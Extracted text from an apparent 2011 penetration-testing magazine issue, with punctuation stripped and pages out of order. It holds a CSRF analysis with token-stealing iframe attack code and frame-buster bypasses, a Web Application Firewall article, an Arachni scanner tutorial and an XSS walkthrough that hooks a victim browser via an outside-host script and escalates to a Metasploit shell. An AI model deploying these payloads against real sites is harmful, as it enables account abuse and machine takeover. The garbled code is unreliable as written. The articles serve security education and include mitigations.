Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
